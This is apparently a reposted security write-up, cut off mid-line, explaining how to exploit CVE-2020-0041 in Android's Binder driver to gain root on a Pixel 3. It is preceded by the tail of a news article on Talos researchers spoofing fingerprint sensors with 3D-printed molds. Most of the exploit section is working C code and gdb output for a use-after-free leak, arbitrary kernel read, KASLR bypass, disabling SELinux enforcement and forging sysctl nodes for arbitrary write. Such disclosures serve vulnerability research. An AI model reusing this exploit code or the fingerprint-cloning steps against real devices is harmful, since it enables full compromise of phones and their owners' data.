and take a photograph of it. After the print is collected using the print reader or photo methods, certain optimizations are often required. For prints recorded on a fingerprint reader, for instance, multiple images had to be merged together to create a single image that was large enough to pass for a real fingerprint. Below is an example of the process, performed on fingerprints the FBI obtained from prohibition-era gangster Al Capone. Enlarge Prints captured on a glass and then photographed, meanwhile, had to be touched up with filters to increase the contrast. Then the researchers used digital sculpting tools such as ZBrush to create a 3D model based on the 2D picture. Enlarge / The 2-D image is on the left; the 3-D model is on the right. Cisco Talos Once the fingerprint was collected from either a scanner or glass and then optimized, the researchers replicated them onto a mold, which was made from either fabric glue or silicon. When working against capacitive sensors, materials also had to include graphite and aluminum powder to increase conductivity. To be successfully passed off as a real finger, the mold had to be a precise size. A variance of just 1 percent too big or too small would cause the attack to fail. This demand complicated the process, since the molds had to be cured to create rigidity and remove toxins. The curing often caused the molds to shrink. Casting the print onto a mold was done with either a 25-micron or 50-micron resolution 3D printer. The former was more accurate but required an hour to print a single mold. The latter took half as long but wasn’t as precise. Once researchers created a mold, they pressed it against the sensor to see if it treated the fake print as the real one enrolled to unlock the phone, laptop, or lock. The chart above showing the results tracks how various collection methods worked against specific devices. In seven cases, direct collection worked the best, and in only one case did a different method—a fingerprint reader—perform better. Making it work in the real world The higher success rate of direct collection doesn’t necessarily mean it’s the most effective collection method in real-world attacks, since it requires that the adversary trick or force a target to press a finger against a squishy piece of clay. By contrast, obtaining fingerprints from print readers or from photos of smudges on glass may be better since nation-state attackers may have an easier time recovering print images from an airport or customs checkpoint or surreptitiously obtaining a drinking glass after a target uses it. Further Reading OPM breach included five times more stolen fingerprints Another possibility is breaching a database of fingerprint data, as hackers did in 2014 when they stole 5.6 million sets of fingerprints from the US Office of Personnel Management. “The direct collection is always the better [option], because we directly have the mold (on the platiline),” Rascagneres, the Talos researcher, wrote in an email. “The size is perfect; we don’t need a 3D printer. This is the more efficient approach. The two other collection methods also work, but with lower success as expected.” The researchers balanced the stringent demands of the attack with a relatively modest budget of just $2,000. “The point of the low budget was to ensure the scenario was as realistic as possible," Rascagneres told me. “We determined if we could do it for $2k then it was reasonably feasible. What we found was that while we could keep the price point low, the process of making functional prints was actually very complex and time consuming.” The takeaway, the researchers said, isn’t that fingerprint authentication is too weak to be trusted. For most people in most settings, it’s perfectly fine, and when risks increase temporarily—such as when police with a search warrant come knocking on a door—users can usually disable fingerprint authentication and fall over to password or PIN verification. At the same time, users should remember that fingerprint authentication is hardly infallible. “Any fingerprint cloning technique is extremely difficult, making fingerprint authentication a valid method for 95 percent of the population,” Ventura, the other Talos researcher, wrote in an email. “People that have a low risk profile and don’t need to worry about nation-state level threat actors are fine. The remaining 5 percent could be exposed and may want to take other precautions.” Sursa: https://arstechnica.com/information-technology/2020/04/attackers-can-bypass-fingerprint-authentication-with-an-80-success-rate/
  25. Exploiting the kernel with CVE-2020-0041 to achieve root privileges Posted on Apr 08, 2020 | Author: Eloi Sanfelix and Jordan Gruskovnjak A few months ago we discovered and exploited a bug in the Binder driver, which we reported to Google on December 10, 2019. The bug was included in the March 2020 Android Security Bulletin, with CVE-2020-0041. In the previous post we described the bug and how to use it to escape the Google Chrome sandbox. If you haven't read that post, please do so now in order to understand what bug we are exploiting and what primitives we have available. In this post we'll describe how to attack the kernel and obtain root privileges on a Pixel 3 device using the same bug. Reminder: memory corruption primitives As described in our previous post, we can corrupt parts of a validated binder transaction while it's being processed by the driver. There are two stages at which these values are used that we could target for our attack: When the transaction is received, it gets processed by the userspace components. This includes libbinder (or libhwbinder if using /dev/hwbinder) as well as upper layers. This is what we used to attack the Chrome browser process in the previous post. When userspace is done with the transaction buffer, it asks the driver to free it with the BC_FREE_BUFFER command. This results in the driver processing the transaction buffer. Let's analyze the transaction buffer cleanup code in the binder driver while considering that we could have corrupted the transaction data: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 static void binder_transaction_buffer_release(struct binder_proc *proc, struct binder_buffer *buffer, binder_size_t failed_at, bool is_failure) { int debug_id = buffer->debug_id; binder_size_t off_start_offset, buffer_offset, off_end_offset; binder_debug(BINDER_DEBUG_TRANSACTION, "%d buffer release %d, size %zd-%zd, failed at %llx\n", proc->pid, buffer->debug_id, buffer->data_size, buffer->offsets_size, (unsigned long long)failed_at); if (buffer->target_node) [1] binder_dec_node(buffer->target_node, 1, 0); off_start_offset = ALIGN(buffer->data_size, sizeof(void *)); off_end_offset = is_failure ? failed_at : off_start_offset + buffer->offsets_size; [2] for (buffer_offset = off_start_offset; buffer_offset < off_end_offset; buffer_offset += sizeof(binder_size_t)) { struct binder_object_header *hdr; size_t object_size; struct binder_object object; binder_size_t object_offset; binder_alloc_copy_from_buffer(&proc->alloc, &object_offset, buffer, buffer_offset, sizeof(object_offset)); object_size = binder_get_object(proc, buffer, object_offset, &object); if (object_size == 0) { pr_err("transaction release %d bad object at offset %lld, size %zd\n", debug_id, (u64)object_offset, buffer->data_size); continue; } hdr = &object.hdr; switch (hdr->type) { case BINDER_TYPE_BINDER: case BINDER_TYPE_WEAK_BINDER: { struct flat_binder_object *fp; struct binder_node *node; fp = to_flat_binder_object(hdr); [3] node = binder_get_node(proc, fp->binder); if (node == NULL) { pr_err("transaction release %d bad node %016llx\n", debug_id, (u64)fp->binder); break; } binder_debug(BINDER_DEBUG_TRANSACTION, " node %d u%016llx\n", node->debug_id, (u64)node->ptr); [4] binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER, 0); binder_put_node(node); } break; ... case BINDER_TYPE_FDA: { ... /* * the source data for binder_buffer_object is visible * to user-space and the @buffer element is the user * pointer to the buffer_object containing the fd_array. * Convert the address to an offset relative to * the base of the transaction buffer. */ [5] fda_offset = (parent->buffer - (uintptr_t)buffer->user_data) + fda->parent_offset; for (fd_index = 0; fd_index < fda->num_fds; fd_index++) { u32 fd; binder_size_t offset = fda_offset + fd_index * sizeof(fd); binder_alloc_copy_from_buffer(&proc->alloc, &fd, buffer, offset, sizeof(fd)); [6] task_close_fd(proc, fd); } } break; default: pr_err("transaction release %d bad object type %x\n", debug_id, hdr->type); break; } } } At [1] the driver checks if there is a target binder node for the current transaction, and if it exists it decrements its reference count. This is interesting because it could trigger the release of such a node if its reference count reaches zero, but we do not have control of this pointer. At [2] the driver iterates through all objects in the transaction, and goes into a switch statement where the required cleanup is performed for each object type. For types BINDER_TYPE_BINDER and BINDER_TYPE_WEAK_BINDER, the cleanup involves looking up an object using fp->binder at [3] and then decrementing the reference count at [4]. Since fp->binder is read from the transaction buffer, we can actually prematurely release node references by replacing this value with a different one. This can in turn lead to use-after-free of binder_node objects. Finally, for BINDER_TYPE_FDA objects we could corrupt the parent->buffer field used at [5] and end up closing arbitrary file descriptors on a remote process. In our exploit we targeted the reference counts of BINDER_TYPE_BINDER objects to cause a use-after-free on objects of type struct binder_node. This is exactly the same type of use-after-free we described in our OffensiveCon presentation about CVE-2019-2205. However some of the techniques we used in that exploit are not available to us in recent kernels anymore. Aside: using binder to talk to yourself The binder driver is designed in such a way that transactions can only be sent to handles you have received from other processes or to the context manager (handle 0). In general, when one wants to talk to a service, they first request a handle to the context manager (servicemanager, hwservicemanager or vndservicemanager for the three Binder domains used in current versions of Android). If a service creates a sub-service or an object on behalf of the client, then the service will send a handle such that the client can talk to the new object. In some situations, it would be beneficial to control both ends of the communication, e.g. to have better timing control for race conditions. In our particular case, we require knowing the address of the receiving-side binder mapping while we are sending the transaction to avoid a crash. Additionally, in order to cause a use-after-free with the corruption primitive we have, the receiving process has to create binder nodes with the fp->binder field equal to the sg_buf value we are corrupting with (which belongs to the sender address space). The easiest way to meet all these constraints is to control both the sending and the receiving end of a transaction. In that case, we have access to all the required values and do not need to use an info-leak to retrieve them from a remote process. However, we are not allowed to register services through the context manager from unprivileged applications, so we cannot go the normal route. Instead, we used the ITokenManager service in the /dev/hwbinder domain to setup the communication channel. To our knowledge, this service was first publicly used by Gal Beniamini in this Project Zero report: Note that in order to pass the binder instance between process A and process B, the "Token Manager" service can be used. This service allows callers to insert binder objects and retrieve 20-byte opaque tokens representing them. Subsequently, callers can supply the same 20-byte token, and retrieve the previously inserted binder object from the service. The service is accessible even to (non-isolated) app contexts (http://androidxref.com/8.0.0_r4/xref/system/sepolicy/private/app.te#188). We use this very same mechanism in our exploit in order to have a handle to our own "process". Note however that "process" here does not really mean an actual process, but a binder_proc structure associated to a binder file descriptor. This means we can open two binder file descriptors, create a token through the first file descriptor and retrieve it from the second one. With this, we have received a handle owned by the first file descriptor, and can now send binder transactions between the two. Leaking data with the binder_node use-after-free Binder nodes are used by the driver in two different ways: as part of transaction contents in order to pass them from one process to another, or as targets of a transaction. When used as part of a transaction, these nodes are always retrieved from a rb-tree of nodes and properly reference counted. When we cause a use-after-free of a node, it also gets removed from the rb-tree. For this reason, we can only have dangling pointers to freed nodes when used as targets of a transaction, since in this case pointers to the actual binder_node are stored by the driver in transaction->target_node. There are quite a few references to target_node in the binder driver, but many of them are performed in the sending path of a transaction or in debug code. From the others, the transaction receipt path provides us a way to leak some data back to userland: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 struct binder_transaction_data *trd = &tr.transaction_data; ... if (t->buffer->target_node) { struct binder_node *target_node = t->buffer->target_node; struct binder_priority node_prio; [1] trd->target.ptr = target_node->ptr; trd->cookie = target_node->cookie; node_prio.sched_policy = target_node->sched_policy; node_prio.prio = target_node->min_priority; binder_transaction_priority(current, t, node_prio, target_node->inherit_rt); cmd = BR_TRANSACTION; } else { trd->target.ptr = 0; trd->cookie = 0; cmd = BR_REPLY; } ... [2] if (copy_to_user(ptr, &tr, trsize)) { if (t_from) binder_thread_dec_tmpref(t_from); binder_cleanup_transaction(t, "copy_to_user failed", BR_FAILED_REPLY); return -EFAULT; } ptr += trsize; At [1] the driver extracts two 64-bit values from the target_node into the transaction_data structure. This structure is later copied to userland at [2]. Therefore, if we receive a transaction after we have freed its target_node and replaced it by another object, we can read out two 64-bit fields at the offsets corresponding to ptr and cookie. If we look at this structure on gdb for a build of a recent pixel 3 kernel, we can see these fields at offsets 0x58 and 0x60 respectively: (gdb) pt /o struct binder_node /* offset | size */ type = struct binder_node { /* 0 | 4 */ int debug_id; /* 4 | 4 */ spinlock_t lock; /* 8 | 24 */ struct binder_work { /* 8 | 16 */ struct list_head { /* 8 | 8 */ struct list_head *next; /* 16 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } entry; /* 24 | 4 */ enum {BINDER_WORK_TRANSACTION = 1, BINDER_WORK_TRANSACTION_COMPLETE, BINDER_WORK_RETURN_ERROR, BINDER_WORK_NODE, BINDER_WORK_DEAD_BINDER, BINDER_WORK_DEAD_BINDER_AND_CLEAR, BINDER_WORK_CLEAR_DEATH_NOTIFICATION} type; /* total size (bytes): 24 */ } work; /* 32 | 24 */ union { /* 24 */ struct rb_node { /* 32 | 8 */ unsigned long __rb_parent_color; /* 40 | 8 */ struct rb_node *rb_right; /* 48 | 8 */ struct rb_node *rb_left; /* total size (bytes): 24 */ } rb_node; /* 16 */ struct hlist_node { /* 32 | 8 */ struct hlist_node *next; /* 40 | 8 */ struct hlist_node **pprev; /* total size (bytes): 16 */ } dead_node; /* total size (bytes): 24 */ }; /* 56 | 8 */ struct binder_proc *proc; /* 64 | 8 */ struct hlist_head { /* 64 | 8 */ struct hlist_node *first; /* total size (bytes): 8 */ } refs; /* 72 | 4 */ int internal_strong_refs; /* 76 | 4 */ int local_weak_refs; /* 80 | 4 */ int local_strong_refs; /* 84 | 4 */ int tmp_refs; /* 88 | 8 */ binder_uintptr_t ptr; /* 96 | 8 */ binder_uintptr_t cookie; /* 104 | 1 */ struct { /* 104: 7 | 1 */ u8 has_strong_ref : 1; /* 104: 6 | 1 */ u8 pending_strong_ref : 1; /* 104: 5 | 1 */ u8 has_weak_ref : 1; /* 104: 4 | 1 */ u8 pending_weak_ref : 1; /* total size (bytes): 1 */ }; /* 105 | 2 */ struct { /* 105: 6 | 1 */ u8 sched_policy : 2; /* 105: 5 | 1 */ u8 inherit_rt : 1; /* 105: 4 | 1 */ u8 accept_fds : 1; /* 105: 3 | 1 */ u8 txn_security_ctx : 1; /* XXX 3-bit hole */ /* 106 | 1 */ u8 min_priority; /* total size (bytes): 2 */ }; /* 107 | 1 */ bool has_async_transaction; /* XXX 4-byte hole */ /* 112 | 16 */ struct list_head { /* 112 | 8 */ struct list_head *next; /* 120 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } async_todo; /* total size (bytes): 128 */ } Therefore, we need to find objects that we can allocate and free at will, and that contain interesting data at these offsets. When we originally reported this bug to Google we produced a minimal exploit that overwrote selinux_enforcing, and we used a kgsl_drawobj_sync which would leak a pointer to itself and a pointer to a kernel function. This was enough for that minimal proof of concept, but not for a full root exploit as we are describing here. For the full exploit, we used the same object as in our CVE-2019-2025 exploit: the epitem structure used to track watched files within eventpoll: (gdb) pt /o struct epitem /* offset | size */ type = struct epitem { /* 0 | 24 */ union { /* 24 */ struct rb_node { /* 0 | 8 */ unsigned long __rb_parent_color; /* 8 | 8 */ struct rb_node *rb_right; /* 16 | 8 */ struct rb_node *rb_left; /* total size (bytes): 24 */ } rbn; /* 16 */ struct callback_head { /* 0 | 8 */ struct callback_head *next; /* 8 | 8 */ void (*func)(struct callback_head *); /* total size (bytes): 16 */ } rcu; /* total size (bytes): 24 */ }; /* 24 | 16 */ struct list_head { /* 24 | 8 */ struct list_head *next; /* 32 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } rdllink; /* 40 | 8 */ struct epitem *next; /* 48 | 12 */ struct epoll_filefd { /* 48 | 8 */ struct file *file; /* 56 | 4 */ int fd; /* total size (bytes): 12 */ } ffd; /* 60 | 4 */ int nwait; /* 64 | 16 */ struct list_head { /* 64 | 8 */ struct list_head *next; /* 72 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } pwqlist; /* 80 | 8 */ struct eventpoll *ep; /* 88 | 16 */ struct list_head { /* 88 | 8 */ struct list_head *next; /* 96 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } fllink; /* 104 | 8 */ struct wakeup_source *ws; /* 112 | 16 */ struct epoll_event { /* 112 | 4 */ __u32 events; /* XXX 4-byte hole */ /* 120 | 8 */ __u64 data; /* total size (bytes): 16 */ } event; /* total size (bytes): 128 */ } As can be seen above, the fllink linked list overlaps with the leaked fields. This list is used by eventpoll to link all epitem structures that are watching the same struct file. Thus, we can leak a pair of kernel pointers. There are several possibilities here, but let's consider how the data structures look like if we have only one such epitem structure for a particular struct file: Therefore, should we leak the fllink contents for the epitem in the picture above, we would learn two identical pointers into the file structure. Now consider what happens if we have a second epitem on the same file: In this case, if we leak from both epitem at the same time, we'd be learning their addresses as well as the address of the corresponding struct file. In our exploit we use both these tricks to disclose a struct file pointer and the address of the freed nodes before using them for the write primitive. Note however that in order to leak data, we need to leave a pending transaction queued until we can trigger the bug and free the binder_node. The exploit does this by having dedicated threads for each pending transaction, and then decrementing the reference count as many times as required to free the node. After this happens, we can leak from the freed buffer at any time we like, as many times as pending transactions we have created. Memory write primitive In order to identify a memory write primitive, we turn to another use of the transaction->target_node field: the decrement of the reference count in binder_transaction_buffer_release discussed earlier. Assume we have replaced the freed node with a fully controlled object. In this case, the driver decrements the reference count of the node with the following code: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 static bool binder_dec_node_nilocked(struct binder_node *node, int strong, int internal) { struct binder_proc *proc = node->proc; assert_spin_locked(&node->lock); if (proc) assert_spin_locked(&proc->inner_lock); if (strong) { if (internal) node->internal_strong_refs--; else node->local_strong_refs--; if (node->local_strong_refs || node->internal_strong_refs) return false; } else { if (!internal) node->local_weak_refs--; if (node->local_weak_refs || node->tmp_refs || !hlist_empty(&node->refs)) return false; } if (proc && (node->has_strong_ref || node->has_weak_ref)) { if (list_empty(&node->work.entry)) { binder_enqueue_work_ilocked(&node->work, &proc->todo); binder_wakeup_proc_ilocked(proc); } [1] } else { if (hlist_empty(&node->refs) && !node->local_strong_refs && !node->local_weak_refs && !node->tmp_refs) { if (proc) { binder_dequeue_work_ilocked(&node->work); rb_erase(&node->rb_node, &proc->nodes); binder_debug(BINDER_DEBUG_INTERNAL_REFS, "refless node %d deleted\n", node->debug_id); } else { [2] BUG_ON(!list_empty(&node->work.entry)); spin_lock(&binder_dead_nodes_lock); /* * tmp_refs could have changed so * check it again */ if (node->tmp_refs) { spin_unlock(&binder_dead_nodes_lock); return false; } [3] hlist_del(&node->dead_node); spin_unlock(&binder_dead_nodes_lock); binder_debug(BINDER_DEBUG_INTERNAL_REFS, "dead node %d deleted\n", node->debug_id); } return true; } } return false; } We can setup the node data such that we reach the else branch at [1] and ensure that node->proc is NULL. In that case we first reach the list_empty check at [2]. To bypass this check we need to setup an empty list (i.e. next and prev point to the list_head itself), which is why we require to leak the node address first. Once we've bypassed the check at [2], we can reach the hlist_del at [3] with controlled data. The function performs the following operations: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 static inline void __hlist_del(struct hlist_node *n) { struct hlist_node *next = n->next; struct hlist_node **pprev = n->pprev; WRITE_ONCE(*pprev, next); if (next) next->pprev = pprev; } static inline void hlist_del(struct hlist_node *n) { __hlist_del(n); n->next = LIST_POISON1; n->pprev = LIST_POISON2; } This boils down to the classic unlink primitive where we can set *X = Y and *(Y+8) = X. Therefore, having two writable kernel addresses we can corrupt some of their data using this. Additionally, if we set next = NULL we can perform a single 8-byte NULL write by having just one kernel address. Reallocating freed nodes with arbitrary contents The steps for obtaining an unlink primitive leading to memory corrupion described above assume we can replace the freed object by a controlled object. We do not need full control of the object, but just enough to pass all the checks and trigger the hlist_del primitive without crashing. In order to achieve that, we used a well known technique: spraying with control messages through the sendmsg syscall. The code for this system call looks as follows: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 static int ___sys_sendmsg(struct socket *sock, struct user_msghdr __user *msg, struct msghdr *msg_sys, unsigned int flags, struct used_address *used_address, unsigned int allowed_msghdr_flags) { struct compat_msghdr __user *msg_compat = (struct compat_msghdr __user *)msg; struct sockaddr_storage address; struct iovec iovstack[UIO_FASTIOV], *iov = iovstack; unsigned char ctl[sizeof(struct cmsghdr) + 20] __attribute__ ((aligned(sizeof(__kernel_size_t)))); /* 20 is size of ipv6_pktinfo */ unsigned char *ctl_buf = ctl; int ctl_len; ssize_t err; ... if (ctl_len > sizeof(ctl)) { [1] ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL); if (ctl_buf == NULL) goto out_freeiov; } err = -EFAULT; /* * Careful! Before this, msg_sys->msg_control contains a user pointer. * Afterwards, it will be a kernel pointer. Thus the compiler-assisted * checking falls down on this. */ [2] if (copy_from_user(ctl_buf, (void __user __force *)msg_sys->msg_control, ctl_len)) goto out_freectl; msg_sys->msg_control = ctl_buf; } ... out_freectl: if (ctl_buf != ctl) [3] sock_kfree_s(sock->sk, ctl_buf, ctl_len); out_freeiov: kfree(iov); return err; } At [1] a buffer is allocated on the kernel heap if the requested control message length is larger than the local ctl buffer. At [2] the control message is copied in from userland, and finally after the message is processed the allocated buffer is freed at [3]. We use a blocking call to make the system call block once the destination socket buffer is full, therefore blocking after the thread between points [2] and [3]. In this way we can control the lifetime of the replacement object. We could also make use of the approach used by Jann Horn in his PROCA exploit: let the sendmsg call complete, and immediately reallocate the object with e.g. a signalfd file descriptor. This would have the advantage of not needing a separate thread for each allocation, but otherwise the results should be fairly similar. In any case, using this type of spraying we can reallocate the freed binder_node with almost complete control, as we require in order to trigger the write primitives described earlier. One thing to note though is that if our spray fails, we'll end up crashing the kernel because of the amount of operations and checks being performed on the freed memory. However, this use-after-free has the very nice property that as long as we do not trigger the write primitive, we can simply close the binder file descriptor and the kernel won't notice any effects. Thus, before we try to trigger a write primitive, we use the leak primitive to verify that we have successfully reallocated the node. We can do this by simply having a large amount of pending transactions, and reading one each time we need to leak some data off the freed object. If the data is not what we expected, we can simply close the binder file descriptor and try again. This property makes the exploit quite reliable even in the presence of relatively unreliable reallocations. Obtaining an arbitrary read primitive At this point, we use the same arbitrary read technique as described in the OffensiveCon 2020 talk. That is, we corrupt file->f_inode and use the following code to perform reads: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 int do_vfs_ioctl(struct file *filp, unsigned int fd, unsigned int cmd, unsigned long arg) { int error = 0; int __user *argp = (int __user *)arg; struct inode *inode = file_inode(filp); switch (cmd) { ... case FIGETBSZ: return put_user(inode->i_sb->s_blocksize, argp); ... If you looked at our slides, back in late 2018 we used a binder mapping spray to bypass PAN and have controlled data at a controlled location. However, the bug we are exploiting here was introduced while getting rid of the long-term kernel-side binder mappings. This means we cannot use binder mapping sprays anymore, and we must find another solution. The solution we came up with was pointing our f_inode field right into an epitem structure. This structure contains a completely controllable 64-bit field: the event.data field. We can modify this field by using ep_ctl(efd, EPOLL_CTL_MOD, fd, &event). Thus, if we line up the data field with the inode->i_sb field we'll be able to perform an arbitrary read. The following picture shows the setup graphically: Note how we have also corrupted the fllink.next field of the epitem, which now points back into the file->f_inode field due to our write primitive. This could be a problem if this field is ever used, but because we are the only users of these struct file and epitem instances, we just need to avoid calling any API that makes use of them and we'll be fine. Based on the setup depicted above, we can now construct an arbitrary read primitive as follows: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 uint64_t read32(uint64_t addr) { struct epoll_event evt; evt.events = 0; evt.data.u64 = addr - 24; int err = epoll_ctl(file->ep_fd, EPOLL_CTL_MOD, pipes[0], &evt); uint32_t test = 0xdeadbeef; ioctl(pipes[0], FIGETBSZ, &test); return test; } uint64_t read64(uint64_t addr) { uint32_t lo = read32(addr); uint32_t hi = read32(addr+4); return (((uint64_t)hi) << 32) | lo; } Note that we set the data field of the epitem to addr - 24, where 24 is the offset of s_blocksize within the superblock structure. Also, even though s_blocksize is in principle 64-bit long, the ioctl code only copies 32-bits back to userland so we need to read twice if we want to read 64 bit values. Now that we have an arbitrary read and we know the address of a struct file from our initial leak, we can simply read its f_op field to retrieve a kernel .text pointer. This then leads to fully bypassing KASLR: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 /* Step 1: leak a pipe file address */ file = node_new("leak_file"); /* Only works on file implementing the 'epoll' function. */ while (!node_realloc_epitem(file, pipes[0])) node_reset(file); uint64_t file_addr = file->file_addr; log_info("[+] pipe file: 0x%lx\n", file_addr); /* Step 2: leak epitem address */ struct exp_node *epitem_node = node_new("epitem"); while (!node_kaddr_disclose(file, epitem_node)) node_reset(epitem_node); printf("[*] file epitem at %lx\n", file->kaddr); /* * Alright, now we want to do a write8 to set file->f_inode. * Given the unlink primitive, we'll set file->f_inode = epitem + 80 * and epitem + 88 = &file->f_inode. * * With this we can change f_inode->i_sb by modifying the epitem data, * and get an arbitrary read through ioctl. * * This is corrupting the fllink, so we better don't touch anything there! */ struct exp_node *write8_inode = node_new("write8_inode"); node_write8(write8_inode, file->kaddr + 120 - 40 , file_addr + 0x20); printf("[*] Write done, should have arbitrary read now.\n"); uint64_t fop = read64(file_addr + 0x28); printf("[+] file operations: %lx\n", fop); kernel_base = fop - OFFSET_PIPE_FOP; printf("[+] kernel base: %lx\n", kernel_base); Disabling SELinux and setting up an arbitrary write primitive Now that we know the kernel base address, we can use our write primitive to write a NULL qword over the selinux_enforcing variable and set SELinux to permissive mode. Our exploit does this before setting up an arbitrary write primitive, because the technique we came up with actually requires disabling SELinux. After considering a few alternatives, we ended up settling for attacking the sysctl tables the kernel uses to handle /proc/sys and all the data hanging from there. There are a number of global tables describing these variables, such as kern_table below: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 static struct ctl_table kern_table[] = { { .procname = "sched_child_runs_first", .data = &sysctl_sched_child_runs_first, .maxlen = sizeof(unsigned int), .mode = 0644, .proc_handler = proc_dointvec, }, #if defined(CONFIG_PREEMPT_TRACER) || defined(CONFIG_IRQSOFF_TRACER) { .procname = "preemptoff_tracing_threshold_ns", .data = &sysctl_preemptoff_tracing_threshold_ns, .maxlen = sizeof(unsigned int), .mode = 0644, .proc_handler = proc_dointvec, }, { .procname = "irqsoff_tracing_threshold_ns", .data = &sysctl_irqsoff_tracing_threshold_ns, .maxlen = sizeof(unsigned int), .mode = 0644, .proc_handler = proc_dointvec, }, ... For example, the first variable is called "sched_child_runs_first", which means it can be accessed through /proc/sys/kernel/sched_child_runs_first. The file mode is 0644, so it's writable for root only (of course SELinux restrictions may apply) and it's an integer. The reading and writing is handled by the proc_dointvec function, which will convert the integer to and from string representation when the file is accessed. The data field points to where the variable is found in memory, which makes it an interesting target to obtain an arbitrary read/write primitive. We initially tried to target some of these variables, but then realized that this table is actually only used during kernel initialization. This means that corrupting the contents of this table is not very useful to us. However, this table is used to create a set of in-memory structures that define the existing sysctl variables and their permissions. These structures can be found by analyzing the sysctl_table_root structure, which contains an rb-tree of ctl_node nodes, which then point to ctl_table tables defining the variables themselves. Since we have a read primitive, we can parse the tree and find the left-most node within it, which has no children nodes. Under normal circumstances, this tree looks as shown in the picture below (only representing left-child connections to keep the diagram somewhat readable): If you look at the alphabetic order of these nodes, you can see that all left-child nodes are sorted in descending alphabetic order. In fact, this is the balancing rule in these trees: left-children have to be lower than the current node, and right-children higher. Thus, to ensure we keep the tree balanced, we add a left child to the left-most node with a name starting with "aaa" using our write8 primitive. The following code finds the left-most node of the tree in prev_node, which will be the insertion point for our fake node: 1 2 3 4 5 6 7 8 9 10 11 12 /* Now we can prepare our magic sysctl node as s child of the left-most node */ uint64_t sysctl_table_root = kernel_base + SYSCTL_TABLE_ROOT_OFFSET; printf("[+] sysctl_table_root = %lx\n", sysctl_table_root); uint64_t ctl_dir = sysctl_table_root + 8; uint64_t node = read64(ctl_dir + 80); uint64_t prev_node; while (node != 0) { prev_node = node; node = read64(node + 0x10); } In order to insert the new node, we need to find a location within kernel memory for it. This is required because modern phones come with PAN (Privileged Access Never) enabled, which prevents the kernel from inadvertently using userland memory. Given that we have an arbitrary read primitive, we sort this out by parsing our process' page tables starting at current->mm->pgd and locating the address of one of our pages in the physmap. Additionally, using the physmap alias of our own userspace page is ideal because we can easily edit the nodes to change the address of the data we want to target, giving us a flexible read/write primitive. We resolve the physmap alias in the following way: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 /* Now resolve our mapping at 2MB. But first read memstart_addr so we can do phys_to_virt() */ memstart_addr = read64(kernel_base + MEMSTART_ADDR_OFFSET); printf("[+] memstart_addr: 0x%lx\n", memstart_addr); uint64_t mm = read64(current + MM_OFFSET); uint64_t pgd = read64(mm + 0x40); uint64_t entry = read64(pgd); uint64_t next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); printf("[+] First level entry: %lx -> next table at %lx\n", entry, next_tbl); /* Offset 8 for 2MB boundary */ entry = read64(next_tbl + 8); next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); printf("[+] Second level entry: %lx -> next table at %lx\n", entry, next_tbl); entry = read64(next_tbl); uint64_t kaddr = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); *(uint64_t *)map = 0xdeadbeefbadc0ded; if ( read64(kaddr) != 0xdeadbeefbadc0ded) { printf("[!] Something went wrong resolving the address of our mapping\n"); goto out; } Note we required to read the contents of memstart_addr in order to be able to translate between physical addresses and the corresponding physmap address. In any case, after running this code we know that the data we find at 0x200000 in our process address space can also be found at kaddr in kernel land. With this, we setup a new sysctl node as follows: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 /* We found the insertion place, setup the node */ uint64_t node_kaddr = kaddr; void *node_uaddr = map; uint64_t tbl_header_kaddr = kaddr + 0x80; void *tbl_header_uaddr = map + 0x80; uint64_t ctl_table_kaddr = kaddr + 0x100; ctl_table_uaddr = map + 0x100; uint64_t procname_kaddr = kaddr + 0x200; void * procname_uaddr = map + 0x200; /* Setup rb_node */ *(uint64_t *)(node_uaddr + 0x00) = prev_node; // parent = prev_node *(uint64_t *)(node_uaddr + 0x08) = 0; // right = null *(uint64_t *)(node_uaddr + 0x10) = 0; // left = null *(uint64_t *)(node_uaddr + 0x18) = tbl_header_kaddr; // my_tbl_header *(uint64_t *)(tbl_header_uaddr) = ctl_table_kaddr; *(uint64_t *)(tbl_header_uaddr + 0x18) = 0; // unregistering *(uint64_t *)(tbl_header_uaddr + 0x20) = 0; // ctl_Table_arg *(uint64_t *)(tbl_header_uaddr + 0x28) = sysctl_table_root; // root *(uint64_t *)(tbl_header_uaddr + 0x30) = sysctl_table_root; // set *(uint64_t *)(tbl_header_uaddr + 0x38) = sysctl_table_root + 8; // parent *(uint64_t *)(tbl_header_uaddr + 0x40) = node_kaddr; // node *(uint64_t *)(tbl_header_uaddr + 0x48) = 0; // inodes.first /* Now setup ctl_table */ uint64_t proc_douintvec = kernel_base + PROC_DOUINTVEC_OFFSET; *(uint64_t 